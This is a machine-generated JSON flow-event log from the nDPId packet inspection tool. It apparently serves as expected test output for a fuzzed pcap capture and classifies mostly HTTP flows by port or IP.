-00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
